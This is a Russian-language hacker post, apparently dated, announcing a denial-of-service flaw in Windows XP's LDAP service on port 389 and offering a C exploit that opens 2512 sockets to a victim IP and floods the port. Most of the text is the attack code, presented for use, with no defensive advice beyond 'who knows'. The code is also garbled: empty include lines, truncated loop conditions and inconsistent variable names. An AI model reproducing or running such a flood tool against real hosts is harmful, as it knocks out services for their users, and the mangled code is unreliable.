DoS-атака на Windows XP.
Реализация LDAP-протокола в Windows XP
Была обнаружена уязвимость в операционной системе Windows XP. Новая атака не влечет за собой фатальных последствий типа «зависания» или перезагрузки, но способна вызвать существенную загрузку процессора. На сей раз объектом нападок стала реализация LDAP-протокола в Windows XP. Идея чрезвычайно проста: в 389-й порт посылается большое количество TCP/IP пакетов, после чего данный сервис умирает.
Данный протокол по умолчанию установлен в Windows XP и предыдущих версиях NT'ей. Поэтому большинство компьютеров с данными системами и активным протоколом уязвимы.
Ниже идёт простой эксплоит, реализация под Windows.
//---------------------------
/*
* Windows XP LDAP DoS
*
* Run: ./d0s ip
*
* Lightweight Directory Access Protocol (LDAP)
* The primary access protocol for Active Directory.
* Denial of Service Exploit
*
* Author: sl0n
* Email: mailto:bigafroelephant@mail.ru
* team: N-force group
*
*/
#include
#include
int main(int argc, char *argv[])
{
sockaddr_in peer;
int port,i;
int num_socks=2512;
int sockfd[2512];
char *send_buffer="sl0n";
char *addr=argv[1];
WSADATA winSockData;
printf("::WinXP DoS by n-force groUp::\n");
if ( argc < 2 )
{
printf(" -- Usage: d0s [ip] \n");
return -1;
}
port=389;
/****** INIT **********/
WSACleanup();
WSAStartup(0x0101, &winSockData);
/********************/
peer.sin_family = AF_INET;
peer.sin_port = htons(port);
peer.sin_addr.s_addr = inet_addr(addr);
for(i=0; i{
if( (sockfd[I]=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("::Error creating socket::");
exit(1);
}
}
for(i=0; i{
if( connect(sockfd[I],(sockaddr*)&peer, sizeof(peer))==-1)
{
printf("::Failed t0 connect [maybe attack was g00d]::\n");
exit(1);
}
}
for(i=0; i{
if(send(sockfd[I],send_buffer,strlen(send_buffer),0) ==-1)
{
printf("::Error sending packet::");
exit(1);
}
}
for(i=0; i{
closesocket(sockfd[I]);
}
WSACleanup();
exit(0);
}
//---------------------------
В данном эксплоите в начале создаётся 2512 сокетов, потом они все соединяются с жертвой, на порт 389. После этого в этот порт посылаеся смертельный пакет по сути говоря это слово "sl0n". Cо временем данный эксплоит будет реализован и под GUI интерфейс. А пока пользуйтесь этим если он вас чем-то не устраивает напишите свой.
Для компиляции рекомендую использовать Borland С .
а как защитится, хз.. :}